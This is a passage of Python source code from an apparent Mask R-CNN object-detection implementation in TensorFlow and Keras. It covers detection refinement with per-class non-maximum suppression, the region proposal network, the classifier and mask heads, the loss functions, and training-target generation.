window: (y1, x1, y2, x2) in normalized coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where
coordinates are normalized.
"""
# Class IDs per ROI
class_ids = tf.argmax(input=probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas_specific * config.BBOX_STD_DEV)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.compat.v1.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.compat.v1.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.compat.v1.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.gather(pre_nms_rois, ixs),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
# Map indices
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(input=class_keep)[0]
class_keep = tf.pad(tensor=class_keep, paddings=[(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.compat.v1.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse.to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(input=class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are normalized.
detections = tf.concat([
tf.gather(refined_rois, keep),
tf.dtypes.cast(tf.gather(class_ids, keep), tf.float32)[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(input=detections)[0]
detections = tf.pad(tensor=detections, paddings=[(0, gap), (0, 0)], mode="CONSTANT")
return detections
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are normalized.
"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def get_config(self):
config = super(DetectionLayer, self).get_config()
config["config"] = self.config.to_dict()
return config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Get windows of images in normalized coordinates. Windows are the area
# in the image that excludes the padding.
# Use the shape of the first image in the batch to normalize the window
# because we know that all images get resized to the same size.
m = parse_image_meta_graph(image_meta)
image_shape = m['image_shape'][0]
window = norm_boxes_graph(m['window'], image_shape[:2])
# Run detection refinement graph on each item in the batch
detections_batch = utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
# [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in
# normalized coordinates
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
############################################################
# Region Proposal Network (RPN)
############################################################
def rpn_graph(feature_map, anchors_per_location, anchor_stride):
"""Builds the computation graph of Region Proposal Network.
feature_map: backbone features [batch, height, width, depth]
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
Returns:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
# TODO: check if stride of 2 causes alignment issues if the feature map
# is not even.
# Shared convolutional base of the RPN
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(input=t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location * depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(input=t)[0], -1, 4]))(x)
return [rpn_class_logits, rpn_probs, rpn_bbox]
def build_rpn_model(anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
############################################################
# Feature Pyramid Network Heads
############################################################
def fpn_classifier_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True,
fc_layers_size=1024):
"""Builds the computation graph of the feature pyramid network classifier
and regressor heads.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
fc_layers_size: Size of the 2 FC layers
Returns:
logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax)
probs: [batch, num_rois, NUM_CLASSES] classifier probabilities
bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to
proposal boxes
"""
# ROI Pooling
# Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_classifier")([rois, image_meta] + feature_maps)
# Two 1024 FC layers (implemented with Conv2D for consistency)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"),
name="mrcnn_class_conv1")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)),
name="mrcnn_class_conv2")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2),
name="pool_squeeze")(x)
# Classifier head
mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes),
name='mrcnn_class_logits')(shared)
mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"),
name="mrcnn_class")(mrcnn_class_logits)
# BBox head
# [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))]
x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'),
name='mrcnn_bbox_fc')(shared)
# Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
s = K.int_shape(x)
if s[1] is None:
mrcnn_bbox = KL.Reshape((-1, num_classes, 4), name="mrcnn_bbox")(x)
else:
mrcnn_bbox = KL.Reshape((s[1], num_classes, 4), name="mrcnn_bbox")(x)
return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox
def build_fpn_mask_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True):
"""Builds the computation graph of the mask head of Feature Pyramid Network.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
Returns: Masks [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, NUM_CLASSES]
"""
# ROI Pooling
# Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_mask")([rois, image_meta] + feature_maps)
# Conv layers
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv1")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv2")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv3")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn3')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv4")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn4')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"),
name="mrcnn_mask_deconv")(x)
x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"),
name="mrcnn_mask")(x)
return x
############################################################
# Loss Functions
############################################################
def smooth_l1_loss(y_true, y_pred):
"""Implements Smooth-L1 loss.
y_true and y_pred are typically: [N, 4], but could be any shape.
"""
diff = K.abs(y_true - y_pred)
less_than_one = K.cast(K.less(diff, 1.0), "float32")
loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5)
return loss
def rpn_class_loss_graph(rpn_match, rpn_class_logits):
"""RPN anchor classifier loss.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG.
"""
# Squeeze last dim to simplify
rpn_match = tf.squeeze(rpn_match, -1)
# Get anchor classes. Convert the -1/+1 match to 0/1 values.
anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32)
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
indices = tf.compat.v1.where(K.not_equal(rpn_match, 0))
# Pick rows that contribute to the loss and filter out the rest.
rpn_class_logits = tf.gather_nd(rpn_class_logits, indices)
anchor_class = tf.gather_nd(anchor_class, indices)
# Cross entropy loss
loss = K.sparse_categorical_crossentropy(target=anchor_class,
output=rpn_class_logits,
from_logits=True)
loss = K.switch(tf.size(input=loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox):
"""Return the RPN bounding box loss graph.
config: the model config object.
target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))].
Uses 0 padding to fill in unsed bbox deltas.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
"""
# Positive anchors contribute to the loss, but negative and
# neutral anchors (match value of 0 or -1) don't.
rpn_match = K.squeeze(rpn_match, -1)
indices = tf.compat.v1.where(K.equal(rpn_match, 1))
# Pick bbox deltas that contribute to the loss
rpn_bbox = tf.gather_nd(rpn_bbox, indices)
# Trim target bounding box deltas to the same length as rpn_bbox.
batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1)
target_bbox = batch_pack_graph(target_bbox, batch_counts,
config.IMAGES_PER_GPU)
loss = smooth_l1_loss(target_bbox, rpn_bbox)
loss = K.switch(tf.size(input=loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def mrcnn_class_loss_graph(target_class_ids, pred_class_logits,
active_class_ids):
"""Loss for the classifier head of Mask RCNN.
target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero
padding to fill in the array.
pred_class_logits: [batch, num_rois, num_classes]
active_class_ids: [batch, num_classes]. Has a value of 1 for
classes that are in the dataset of the image, and 0
for classes that are not in the dataset.
"""
# During model building, Keras calls this function with
# target_class_ids of type float32. Unclear why. Cast it
# to int to get around it.
target_class_ids = tf.cast(target_class_ids, 'int64')
# Find predictions of classes that are not in the dataset.
pred_class_ids = tf.argmax(input=pred_class_logits, axis=2)
# TODO: Update this line to work with batch > 1. Right now it assumes all
# images in a batch have the same active_class_ids
pred_active = tf.gather(active_class_ids[0], pred_class_ids)
# Loss
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=target_class_ids, logits=pred_class_logits)
# Erase losses of predictions of classes that are not in the active
# classes of the image.
loss = loss * pred_active
# Computer loss mean. Use only predictions that contribute
# to the loss to get a correct mean.
loss = tf.reduce_sum(input_tensor=loss) / tf.reduce_sum(input_tensor=pred_active)
return loss
def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox):
"""Loss for Mask R-CNN bounding box refinement.
target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))]
target_class_ids: [batch, num_rois]. Integer class IDs.
pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))]
"""
# Reshape to merge batch and roi dimensions for simplicity.
target_class_ids = K.reshape(target_class_ids, (-1,))
target_bbox = K.reshape(target_bbox, (-1, 4))
pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4))
# Only positive ROIs contribute to the loss. And only
# the right class_id of each ROI. Get their indices.
positive_roi_ix = tf.compat.v1.where(target_class_ids > 0)[:, 0]
positive_roi_class_ids = tf.cast(
tf.gather(target_class_ids, positive_roi_ix), tf.int64)
indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1)
# Gather the deltas (predicted and true) that contribute to loss
target_bbox = tf.gather(target_bbox, positive_roi_ix)
pred_bbox = tf.gather_nd(pred_bbox, indices)
# Smooth-L1 Loss
loss = K.switch(tf.size(input=target_bbox) > 0,
smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox),
tf.constant(0.0))
loss = K.mean(loss)
return loss
def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks):
"""Mask binary cross-entropy loss for the masks head.
target_masks: [batch, num_rois, height, width].
A float32 tensor of values 0 or 1. Uses zero padding to fill array.
target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded.
pred_masks: [batch, proposals, height, width, num_classes] float32 tensor
with values from 0 to 1.
"""
# Reshape for simplicity. Merge first two dimensions into one.
target_class_ids = K.reshape(target_class_ids, (-1,))
mask_shape = tf.shape(input=target_masks)
target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3]))
pred_shape = tf.shape(input=pred_masks)
pred_masks = K.reshape(pred_masks,
(-1, pred_shape[2], pred_shape[3], pred_shape[4]))
# Permute predicted masks to [N, num_classes, height, width]
pred_masks = tf.transpose(a=pred_masks, perm=[0, 3, 1, 2])
# Only positive ROIs contribute to the loss. And only
# the class specific mask of each ROI.
positive_ix = tf.compat.v1.where(target_class_ids > 0)[:, 0]
positive_class_ids = tf.cast(
tf.gather(target_class_ids, positive_ix), tf.int64)
indices = tf.stack([positive_ix, positive_class_ids], axis=1)
# Gather the masks (predicted and true) that contribute to loss
y_true = tf.gather(target_masks, positive_ix)
y_pred = tf.gather_nd(pred_masks, indices)
# Compute binary cross entropy. If no positive ROIs, then return 0.
# shape: [batch, roi, num_classes]
loss = K.switch(tf.size(input=y_true) > 0,
K.binary_crossentropy(target=y_true, output=y_pred),
tf.constant(0.0))
loss = K.mean(loss)
return loss
############################################################
# Data Generator
############################################################
def load_image_gt(dataset, config, image_id, augmentation=None):
"""Load and return ground truth data for an image (image, mask, bounding boxes).
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
Returns:
image: [height, width, 3]
shape: the original shape of the image before resizing and cropping.
class_ids: [instance_count] Integer class IDs
bbox: [instance_count, (y1, x1, y2, x2)]
mask: [height, width, instance_count]. The height and width are those
of the image unless use_mini_mask is True, in which case they are
defined in MINI_MASK_SHAPE.
"""
# Load image and mask
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
original_shape = image.shape
image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=config.IMAGE_MIN_DIM,
min_scale=config.IMAGE_MIN_SCALE,
max_dim=config.IMAGE_MAX_DIM,
mode=config.IMAGE_RESIZE_MODE)
mask = utils.resize_mask(mask, scale, padding, crop)
# Augmentation
# This requires the imgaug lib (https://github.com/aleju/imgaug)
if augmentation:
import imgaug
# Augmenters that are safe to apply to masks
# Some, such as Affine, have settings that make them unsafe, so always
# test your augmentation on masks
MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes",
"Fliplr", "Flipud", "CropAndPad",
"Affine", "PiecewiseAffine"]
def hook(images, augmenter, parents, default):
"""Determines which augmenters to apply to masks."""
return augmenter.__class__.__name__ in MASK_AUGMENTERS
# Store shapes before augmentation to compare
image_shape = image.shape
mask_shape = mask.shape
# Make augmenters deterministic to apply similarly to images and masks
det = augmentation.to_deterministic()
image = det.augment_image(image)
# Change mask to np.uint8 because imgaug doesn't support np.bool
mask = det.augment_image(mask.astype(np.uint8),
hooks=imgaug.HooksImages(activator=hook))
# Verify that shapes didn't change
assert image.shape == image_shape, "Augmentation shouldn't change image size"
assert mask.shape == mask_shape, "Augmentation shouldn't change mask size"
# Change mask back to bool
mask = mask.astype(np.bool)
# Note that some boxes might be all zeros if the corresponding mask got cropped out.
# and here is to filter them out
_idx = np.sum(mask, axis=(0, 1)) > 0
mask = mask[:, :, _idx]
class_ids = class_ids[_idx]
# Bounding boxes. Note that some boxes might be all zeros
# if the corresponding mask got cropped out.
# bbox: [num_instances, (y1, x1, y2, x2)]
bbox = utils.extract_bboxes(mask)
# Active classes
# Different datasets have different classes, so track the
# classes supported in the dataset of this image.
active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)
source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]]
active_class_ids[source_class_ids] = 1
# Resize masks to smaller size to reduce memory usage
if config.USE_MINI_MASK:
mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)
# Image meta data
image_meta = compose_image_meta(image_id, original_shape, image.shape,
window, scale, active_class_ids)
return image, image_meta, class_ids, bbox, mask
def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config):
"""Generate targets for training Stage 2 classifier and mask heads.
This is not used in normal training. It's useful for debugging or to train
the Mask RCNN heads without using the RPN head.
Inputs:
rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes.
gt_class_ids: [instance count] Integer class IDs
gt_boxes: [instance count, (y1, x1, y2, x2)]
gt_masks: [height, width, instance count] Ground truth masks. Can be full
size or mini-masks.
Returns:
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)]
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific
bbox refinements.
masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES). Class specific masks cropped
to bbox boundaries and resized to neural network output size.
"""
assert rpn_rois.shape[0] > 0
assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format(
gt_class_ids.dtype)
assert gt_boxes.dtype == np.int32, "Expected int but got {}".format(
gt_boxes.dtype)
assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format(
gt_masks.dtype)
# It's common to add GT Boxes to ROIs but we don't do that here because
# according to XinLei Chen's paper, it doesn't help.
# Trim empty padding in gt_boxes and gt_masks parts
instance_ids = np.where(gt_class_ids > 0)[0]
assert instance_ids.shape[0] > 0, "Image must contain instances."
gt_class_ids = gt_class_ids[instance_ids]
gt_boxes = gt_boxes[instance_ids]
gt_masks = gt_masks[:, :, instance_ids]
# Compute areas of ROIs and ground truth boxes.
rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \
(rpn_rois[:, 3] - rpn_rois[:, 1])
gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \
(gt_boxes[:, 3] - gt_boxes[:, 1])
# Compute overlaps [rpn_rois, gt_boxes]
overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0]))
for i in range(overlaps.shape[1]):
gt = gt_boxes[i]
overlaps[:, i] = utils.compute_iou(
gt, rpn_rois, gt_box_area[i], rpn_roi_area)
# Assign ROIs to GT boxes
rpn_roi_iou_argmax = np.argmax(overlaps, axis=1)
rpn_roi_iou_max = overlaps[np.arange(
overlaps.shape[0]), rpn_roi_iou_argmax]
# GT box assigned to each ROI
rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax]
rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax]
# Positive ROIs are those with >= 0.5 IoU with a GT box.
fg_ids = np.where(rpn_roi_iou_max > 0.5)[0]
# Negative ROIs are those with max IoU 0.1-0.5 (hard example mining)
# TODO: To hard example mine or not to hard example mine, that's the question
# bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0]
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
# Subsample ROIs. Aim for 33% foreground.
# FG
fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO)
if fg_ids.shape[0] > fg_roi_count:
keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False)
else:
keep_fg_ids = fg_ids
# BG
remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0]
if bg_ids.shape[0] > remaining:
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
else:
keep_bg_ids = bg_ids
# Combine indices of ROIs to keep
keep = np.concatenate([keep_fg_ids, keep_bg_ids])
# Need more?
remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0]
if remaining > 0:
# Looks like we don't have enough samples to maintain the desired
# balance. Reduce requirements and fill in the rest. This is
# likely different from the Mask RCNN paper.
# There is a small chance we have neither fg nor bg samples.
if keep.shape[0] == 0:
# Pick bg regions with easier IoU threshold
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
assert bg_ids.shape[0] >= remaining
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
assert keep_bg_ids.shape[0] == remaining
keep = np.concatenate([keep, keep_bg_ids])
else:
# Fill the rest with repeated bg rois.
keep_extra_ids = np.random.choice(
keep_bg_ids, remaining, replace=True)
keep = np.concatenate([keep, keep_extra_ids])
assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \
"keep doesn't match ROI batch size {}, {}".format(
keep.shape[0], config.TRAIN_ROIS_PER_IMAGE)
# Reset the gt boxes assigned to BG ROIs.
rpn_roi_gt_boxes[keep_bg_ids, :] = 0
rpn_roi_gt_class_ids[keep_bg_ids] = 0
# For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement.
rois = rpn_rois[keep]
roi_gt_boxes = rpn_roi_gt_boxes[keep]
roi_gt_class_ids = rpn_roi_gt_class_ids[keep]
roi_gt_assignment = rpn_roi_iou_argmax[keep]
# Class-aware bbox deltas. [y, x, log(h), log(w)]
bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE,
config.NUM_CLASSES, 4), dtype=np.float32)
pos_ids = np.where(roi_gt_class_ids > 0)[0]
bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement(
rois[pos_ids], roi_gt_boxes[pos_ids, :4])
# Normalize bbox refinements
bboxes /= config.BBOX_STD_DEV
# Generate class-specific target masks
masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES),
dtype=np.float32)
for i in pos_ids:
class_id = roi_gt_class_ids[i]
assert class_id > 0, "class id must be greater than 0"
gt_id = roi_gt_assignment[i]
class_mask = gt_masks[:, :, gt_id]
if config.USE_MINI_MASK:
# Create a mask placeholder, the size of the image
placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool)
# GT box
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id]
gt_w = gt_x2 - gt_x1
gt_h = gt_y2 - gt_y1
# Resize mini mask to size of GT box
placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \
np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool)
# Place the mini batch in the placeholder
class_mask = placeholder
# Pick part of the mask and resize it
y1, x1, y2, x2 = rois[i].astype(np.int32)
m = class_mask[y1:y2, x1:x2]
mask = utils.resize(m, config.MASK_SHAPE)
masks[i, :, :, class_id] = mask
return rois, roi_gt_class_ids, bboxes, masks
def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2)]
gt_class_ids: [num_gt_boxes] Integer class IDs.
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)]
Returns:
rpn_match: [N] (int32) matches between anchors and GT boxes.
1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
"""
# RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32)
# RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))]
rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4))
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = np.where(gt_class_ids < 0)[0]
if crowd_ix.shape[0] > 0:
# Filter out crowds from ground truth class IDs and boxes
non_crowd_ix = np.where(gt_class_ids > 0)[0]
crowd_boxes = gt_boxes[crowd_ix]
gt_class_ids = gt_class_ids[non_crowd_ix]
gt_boxes = gt_boxes[non_crowd_ix]
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes)
crowd_iou_max = np.amax(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
else:
# All anchors don't intersect a crowd
no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool)
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = utils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= 0.7 then it's positive.
# If an anchor overlaps a GT box with IoU < 0.3 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.3).
#
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
